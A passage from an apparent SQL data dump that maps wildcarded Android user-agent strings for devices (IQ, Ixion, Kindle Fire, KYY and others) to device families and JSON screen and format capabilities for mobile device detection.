Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":540,\"screenHeight\":960,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\",\"wbmp\"]}'),('Mozilla/5.0 (Linux; Android 4.*; I216X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":540,\"screenHeight\":960,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; I9355A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ILIUM L1100) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ILIUM S106) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ILIUM S520) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ILIUM X200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; INSIGNIA_700_PRO) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"pixelRatio\":1,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ+) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ1855) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ436i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":480,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4406) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4406) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4413_Quad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4415 Quad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4416) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4416) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4417 Quad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4418) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ444 Quattro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ446) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4490i) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4502 Quad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4503 Quad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4504 Quad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4505 Quad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ451) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4511 Octa) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4512 Quad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4514 Quad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ4516 Octa) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ453 Quad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ456) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ456) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IQ458 Quad) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Ice2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IdeaTab A3000-H) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo_ideatab','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IdeaTab S6000-H) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_lenovo_ideatab','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Ilium X200) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Ilium_X200) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; ImSmart S471) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; InFocus M550 3D) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; IncredibleS_S710e) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":533,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Infinix X509) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Infinix-X551) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_infinix','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Ixion E150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Ixion EL150 Charger) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Ixion ES150) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Ixion M250 Ferrum) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Ixion X140) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_ixion','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":384,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; JY-G4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; JY-G4) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; JY-G4S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; JY-S3S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; K00G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; K010) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; K01A) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; K01E) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; K2-01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; K4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; K8 4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KAZAM Trooper2 50) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":569,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KC-01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KC-S301AE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KC-S701) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KENEKSI_Choice) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_keneksi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KENEKSI_Rock) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_keneksi','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KFAPWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KFJWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":800,\"screenHeight\":1280,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KFOT) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":1024,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KFSOWI) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":534,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KFSOWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":534,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KFTHWA) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KFTHWI) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":600,\"screenHeight\":960,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KFTT) AppleWebKit/* (KHTML, like Gecko) Silk like Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":534,\"screenHeight\":854,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KIS C341) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KISSME-DG580) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KM0418) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KYL22) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KYV31) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KYV33) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KYY22) AppleWebKit/* (KHTML, like Gecko) Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KYY23) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; KYY24) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Karbonn A5s) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_karbonn','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 4.*; Kavak Y625-U03) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 